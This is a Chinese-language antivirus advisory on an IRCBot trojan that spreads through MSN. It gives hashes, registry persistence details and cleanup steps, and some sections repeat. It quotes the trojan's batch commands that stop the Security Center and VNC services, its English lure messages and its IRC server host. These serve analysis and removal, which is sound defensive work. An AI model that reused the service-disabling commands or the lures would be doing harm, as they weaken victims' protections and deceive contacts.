病毒名稱:Trojan.Win32.Delf.ads(Kaspersky)
病毒大小:141,824 字節
樣本MD5:ef2e009208e0efef05d149ee06388dd3
病毒大小:141,824 字節
樣本MD5:ef2e009208e0efef05d149ee06388dd3
樣本SHA1:45e43fb7bd4eb62d524927f5be71240a74c9bb6b
發現時間:2007.7
更新時間:2007.7
傳播方式:通過MSN傳播
技術分析
變種:
MSN傳播病毒Backdoor.Win32.IRCBot.acd解決方法
通過MSN傳播的IRCBot photo album.zip rdshost.dll 解決方案
MSN傳播病毒Backdoor.Win32.IRCBot.acd解決方法
傳播方式:通過MSN傳播
技術分析
變種:
MSN傳播病毒Backdoor.Win32.IRCBot.acd解決方法
通過MSN傳播的IRCBot photo album.zip rdshost.dll 解決方案
MSN傳播病毒Backdoor.Win32.IRCBot.acd解決方法
MSN病毒firewallav.dll printers.exe 解決方案
MSN病毒images.zip winlog32.exe 解決方案
MSN病毒images.zip winlog32.exe 解決方案
通過MSN傳播的IRCBot msn.exe libcintles3.dll 解決方案
通過MSN傳播的IRCBot intlprinters.exe libcintles3.dll 解決方案
通過MSN傳播的IRCBot msn.exe notice.dll 解決方案
通過MSN傳播的IRCBot msnmsg.exe pic.zip 解決方案
通過MSN傳播的IRCBot intlprinters.exe libcintles3.dll 解決方案
通過MSN傳播的IRCBot msn.exe notice.dll 解決方案
通過MSN傳播的IRCBot msnmsg.exe pic.zip 解決方案
病毒向MSN聯系人發送消息和偽裝成照片的帶毒壓縮包,當對方聯系人接收并打開壓縮包中的文件時系統受到感染。
%Windows%pic.zip
壓縮包內文件名是IMG34814.pif。
創建一個副本:
%Windows%msnmsg.exe !
創建啟動項:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Microsoft Genuine Logon"="msnmsg.exe"
%Windows%pic.zip
壓縮包內文件名是IMG34814.pif。
創建一個副本:
%Windows%msnmsg.exe !
創建啟動項:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Microsoft Genuine Logon"="msnmsg.exe"
試圖使用c:a.bat批處理停止“安全中心”和“WinVNC”服務:
@echo off
net stop "Security Center"
net stop winvnc4
del c:a.bat
向MSN聯系人發送消息和偽裝成照片的帶毒壓縮包%Windows%images.zip:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
@echo off
net stop "Security Center"
net stop winvnc4
del c:a.bat
向MSN聯系人發送消息和偽裝成照片的帶毒壓縮包%Windows%images.zip:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips
Look what i made out of cans!! haah :-P! h;
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
This is what happens when you eat to many chips
Look what i made out of cans!! haah :-P! h;
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of harry potter?
嘗試連接的遠程IRC:down.basecore.info !
Mutex:LANSSS
清除步驟
1. 刪除病毒的啟動項(開始菜單-運行-輸入“regedit”進入注冊表依次找到說明選項并按提示操作):
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Microsoft Genuine Logon"="msnmsg.exe"
2. 重新啟動計算機
3. 刪除病毒文件(如遇提示無法刪除文件,到down.45it.com下載費爾木馬強制刪除器工具進行強制刪除):
%Windows%pic.zip
嘗試連接的遠程IRC:down.basecore.info !
Mutex:LANSSS
清除步驟
1. 刪除病毒的啟動項(開始菜單-運行-輸入“regedit”進入注冊表依次找到說明選項并按提示操作):
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Microsoft Genuine Logon"="msnmsg.exe"
2. 重新啟動計算機
3. 刪除病毒文件(如遇提示無法刪除文件,到down.45it.com下載費爾木馬強制刪除器工具進行強制刪除):
%Windows%pic.zip
%Windows%msnmsg.exe